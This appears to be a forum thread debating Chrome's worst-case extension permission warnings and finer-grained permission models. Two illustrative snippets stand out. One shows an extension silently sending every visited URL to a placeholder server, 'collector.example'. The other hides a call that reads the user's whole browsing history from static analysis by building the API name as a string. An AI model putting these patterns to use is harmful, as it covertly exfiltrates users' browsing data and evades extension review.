
I spent some time building a couple of productivity extensions, for Gmail replies[0] and quick note-taking[1]. It was a lot of fun, but like other people have mentioned, porting to and working with Manifest V3 is not as nice. I've also noticed that the way Google asks the user for permissions is phrased in human-understandable, but worst-case language. For example, I wanted access to the current tab so I could inject an overlay, and a friend told me that during installation the store warned that I was asking to see their history and browsing data. Which is true - knowing what page they're on does let you recreate their browsing history... but when presented to the user like that, it makes it seem like tracking history is the primary thing the extension does. Anyway, frustrating.

[0] https://chrome.google.com/webstore/detail/akndolpagcjaolannk... [1] https://chrome.google.com/webstore/detail/icdbglcdnjonofjpcf...




They're describing the worst-case thing someone could do with the privilege being granted, because they have no way of saying what the developer will do with the privilege.

The way to make the prompt sound less scary is to use finer-grained permissions where the worst-case thing someone could do is less scary.

(Or, if there aren't any fine-grained permissions suited to doing your task — then propose some! The browser vendors would love to get real feedback on the kinds of hypothetical fine-grained privileges that extension authors would actually find useful. Otherwise they're stuck reading the source code of a small sample of extensions, and extrapolating general patterns of privilege use from there.)


> They're describing the worst-case thing someone could do with the privilege

I understand that - I wrote just that in my comment above. But it's a lot scarier to see a pop-up that only states the worst case than to see the worst-case scenario alongside a longer explanation. I see from your profile that you're at a web3 analytics company. I'll just say that I think MetaMask would be a lot less popular if, at install time, the Chrome store warned that it can "make you lose all your crypto savings". Yes, this is possible, but there's more to the situation than just a few words, and you can't express all of that in an alert() window.

> if there aren't any fine-grained permissions suited to doing your task — then propose some

I think that is easy to say, but having subscribed to and followed the extension feedback threads I've been on for the last few years, I'm not super confident in Google acting on community feedback.


The thing is, from the POV of both Google and the user, there is no reason to assume a typical extension doesn't do the worst-case. The browser is just too juicy a target, and it's way too easy to make money on user surveillance / data exfiltration.

People rightfully point out that if you have access to the current URL, you technically have access to browsing history. The right approach is to assume you will use it, hence the warning. Unfortunately, the only way to prevent this is to ensure the extension never, ever gets to make a network request on its own, or to populate any field that could become part of a network request triggered by the site or by another extension.

It's a trust issue. It's not just fear that you might theoretically sell your extension to some unscrupulous third party. I don't know you personally. I have no reason to assume you are not an unscrupulous party. At this point there are, like, four or five extensions I trust enough to use, and it's mostly because they're OSS and it would be frontpage news on HN if any of them deviated from the expected functionality even slightly.

Having a much finer-grained permission system would help a little, at the cost of making it incomprehensible to most users; there's a limit past which it's too complicated to be useful. We need actual innovation in the trust space - by which I don't mean crypto zero-trust shenanigans, but rather a system in which I can trust that, should a browser extension or phone app turn malicious, the vendor will be legally liable, and that this is actually enforced - thus disincentivizing malicious apps/extensions.


tbh I get your point, but a lot of scams work because people don't realize what they're granting. It's better to present the worst case and have people who don't read the fine print uninstall your harmless extension, than not to and have those same people install malicious extensions because "there's no way it can see my browser history, all it does is add an overlay to the current tab!"

Web3 services like MetaMask are primary examples which should have these big warnings, because crypto is rife with scams where someone does something (e.g. opens an airdrop, saves their seed phrase in Google Drive) that gives an attacker access to their account without them realizing it. I don't doubt MetaMask is legit, but you want people to be diligent and understand that whenever they hook one of these apps up to their wallet they are creating a lot of potential for it to be compromised, so maybe be careful, and honestly maybe use fewer of them.


The longer explanation might be correct in the short term, but long term I'm going to assume that you will eventually either take advantage of everything that permission lets you do to maximize your revenue, or sell the extension to somebody who buys it precisely because users have already granted that permission and they can exploit that trust.

I think what Google is doing is correct.


Alternatively, phrase the permission as what the app is technically trying to do, with a warning about what this could be used for.

"This extension wants be able to inject content in any tab. (Warning: This could potentially be used to track history of sites, and access all browsing data)."

That is actually accurate, while the current message is misleading.

Imagine this sort of scheme extended to "root" permission in ChromeOS. Stating the worst case vs. being accurate with a warning about the worst case would look like this:

> [Appname] wants permission to steal all your data and brick your device.

and

> [Appname] wants full control of this device. (Warning: this level of access could be used to steal your data, or brick your device).

The first one is most likely untrue, and borders on libel, while the second is true and accurate.


> (Or, if there aren't any fine-grained permissions suited to doing your task — then propose some! The browser vendors would love to get real feedback on the kinds of fine-grained hypothetical privileges that extensions authors would actually find useful. Otherwise they're stuck reading the source code of a small sample of extensions, and extrapolating general patterns of privilege-use from there.)

I'm curious, where are people supposed to do this? Is there actually a space / mechanism for this? Or is this a thing they would "like" to exist that there's not really an avenue for?


I think the avenue is "writing a blog post, posting it on HN, and having enough people agree with you that it'll stick around on the front page for long enough to expect some Chrome/Safari/Mozilla developer to see it."


A lot of Chrome development is public; check out https://www.chromium.org


> (Or, if there aren't any fine-grained permissions suited to doing your task — then propose some! The browser vendors would love to get real feedback on the kinds of fine-grained hypothetical privileges that extensions authors would actually find useful. Otherwise they're stuck reading the source code of a small sample of extensions, and extrapolating general patterns of privilege-use from there.)

We did, related to ad blocking, and they ignored it.


Would be interesting if they did the same thing for their own operation. "We collect all the data that we can about you, so that we can become a megacorp that can control most of your life." Wonder why they don't do it?


This is keeping me from installing extensions.


Have you tried using the "activeTab" permission? It doesn't show the user any warnings and "gives an extension temporary access to the currently active tab when the user invokes the extension".

https://developer.chrome.com/docs/extensions/mv3/manifest/ac...
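
For what it's worth, a minimal MV3 sketch of that flow (file names and the overlay contents are just placeholders, not anything from the extensions mentioned above). In manifest.json, only the relevant keys:

    {
      "manifest_version": 3,
      "permissions": ["activeTab", "scripting"],
      "action": { "default_title": "Show overlay" },
      "background": { "service_worker": "background.js" }
    }

and in background.js:

    // Runs only when the user clicks the toolbar button, so activeTab
    // grants access to just that one tab, just for that invocation.
    chrome.action.onClicked.addListener((tab) => {
      chrome.scripting.executeScript({
        target: { tabId: tab.id },
        func: () => {
          const overlay = document.createElement('div');
          overlay.textContent = 'Hello from the extension';
          overlay.style.cssText =
            'position:fixed;top:0;right:0;z-index:2147483647;background:#fff;padding:8px';
          document.body.appendChild(overlay);
        },
      });
    });

The trade-off is that the user has to invoke the extension explicitly; you don't get to run on every page load the way a host-permission content script would.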


Maybe the current version of your extension doesn't use that permission to track history and browsing data. But what about after an update or two or after it's been sold to the highest bidder, unbeknownst to the user? Worst case scenario is totally what I'd want to see as a power user.


Somewhat tangentially, I've been pushing for a popup/overlay API that lets you specify the position and size and doesn't require any origin permissions.

https://github.com/w3c/webextensions/issues/307


I know this hurts as a developer, but using this language is just a way of being honest with the user.


As a user it's not that helpful when extensions which inject stuff into the page (lots of them) all say they can access your history and browsing data. Even though it's actually true, it feels like a gap in the permissions model.


The problem is the gap is a mile wide. If you can see the current page URL, you can see the next page URL, and so, one page at a time, you have the user's browsing "history" from the moment they installed the extension. If you can run arbitrary JavaScript, you can also check the back URL. You could potentially add some scope-related restrictions on what injected JavaScript can do based on the permissions of the injecting extension, but that still doesn't stop this sort of one-page-at-a-time discovery of your private information and/or browsing history.
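
To make that concrete: a hypothetical extension with broad host permissions needs only a few lines to rebuild history. (The endpoint here is made up, purely for illustration.)

    // content.js - injected into every page via "matches": ["<all_urls>"]
    chrome.runtime.sendMessage({ url: location.href, t: Date.now() });

    // background.js - quietly forwards every visit to a server the author controls
    chrome.runtime.onMessage.addListener((msg) => {
      fetch('https://collector.example/log', {
        method: 'POST',
        body: JSON.stringify(msg),
      });
    });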


The only actual solution to this problem is some kind of human review.

I wouldn't be against an "App Store" model provided users could go around it if they chose. I think Mozilla does something like this with certain "featured" extensions?


You would need to have code review on every update, ensure that no code downloads anything it then evaluates, and potentially even check for interactions with other plugins that could be compromised to provide eval mechanisms in an effort to "wash hands" of any malicious changes in later updates. (The long tail of updates seems to be one of the significant risk factors, with less scrupulous actors trying to buy popular extensions for things like ad revenue before later dumping them to people who use them for malware, or eventually turning to malware themselves.)

A review process can help, but sadly it's got a lot of work to do if it wants to actually "solve" the problems here.


The Opera browser used to have human reviewers for extensions. They would even comment on code quality and reject submissions until the requested fixes were implemented.

I don't know if they still do it now or even if the browser is still developed.


> it feels like a gap in the permissions model.

It _is_ a gap in the permissions model.


Then they need to be that explicit in other places too, for consistency. Technically, third-party cookies also allow the same thing (tracking your browsing history, and other "worst case" results), but do they present it that way to the user when the user starts up Chrome and/or loads google.com?

Try analyzing these things while wearing a tinfoil hat. Google wants to gimp extensions so that we're one step further away from tampering with the precious data pipe Google wants to run from their servers to the user's monitor/eyeballs. If extensions get in the way of that, Google will neglect them (whether purposefully or conveniently unintentionally, as with this seemingly benign wording).


Maybe I'm underestimating the difficulty of this, but would it not make more sense for platforms to just give the user a complete listing of all the unique API function/method calls used by the app/extension with user-friendly descriptions of each?

The APIs would still be grouped by permission, but the user would be able to expand into a list of checkmarks showing to what extent those permissions are used. As well, an alert would be shown if any API usage changes between updates.
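
As a rough sketch of where such a listing could come from - a naive literal scan over the packaged source, not how any store actually does it:

    // naive-scan.js (Node): list chrome.* API references that appear
    // literally in an extension's source file.
    const fs = require('fs');

    const source = fs.readFileSync(process.argv[2], 'utf8');
    const calls = new Set(
      [...source.matchAll(/chrome\.[A-Za-z_$][\w$.]*/g)].map((m) => m[0])
    );
    console.log([...calls].sort().join('\n'));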


Several problems.

1) Bypassing any sort of static analysis of your extension requires, at worst, crafting an arbitrary code execution attack against yourself. This is not particularly difficult (see the sketch after this list).

2) Oftentimes, the specific method you want to use is more powerful than what you actually need, so even if you were restricted to those specific methods, you would still have more power than you actually use.

3) Supposing you want to go down the "whitelist at the method level" approach, you could just ... whitelist at the method level. The developer knows what methods they will be calling, so just have a separate permission for each of them. In practice, this would lead to a lot of permissions that are effectively equivalent, and people would be asking why they aren't just bundled together into a single permission.
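
To illustrate 1): assuming the extension already holds the history permission, a one-line computed property access is enough to hide the call from the kind of literal scan sketched above.

    // Nothing below literally says "chrome.history", so a pattern-based
    // listing would miss it - yet it reads the user's entire history.
    const api = 'hist' + 'ory';
    chrome[api].search({ text: '', maxResults: 100000 }, (items) => {
      console.log(items.length, 'history entries');
    });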


4) Paraphrasing Hofstadter's law, 2) remains true even if you account for it, because of how APIs interact.

The example raised elsewhere in the thread is a good one: in a browser, if you have access to the current URL of any tab in whose context you run, you can start building a browsing history. Whatever mitigations one could think of get defeated if the extension is allowed to make network requests, or to modify the content of web pages. Once an extension can communicate with the outside world, it can exfil the data, even piece by piece - and it can also keep its state outside the browser.

Same applies to mobile apps.



